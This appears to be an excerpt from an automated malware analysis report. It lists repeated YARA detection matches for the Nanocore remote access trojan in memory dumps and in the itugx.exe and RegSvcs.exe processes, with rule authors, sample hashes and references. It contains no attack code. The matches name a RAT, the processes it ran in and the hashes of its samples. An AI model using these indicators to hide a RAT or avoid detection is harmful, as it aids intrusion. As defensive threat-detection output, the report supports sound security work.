      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
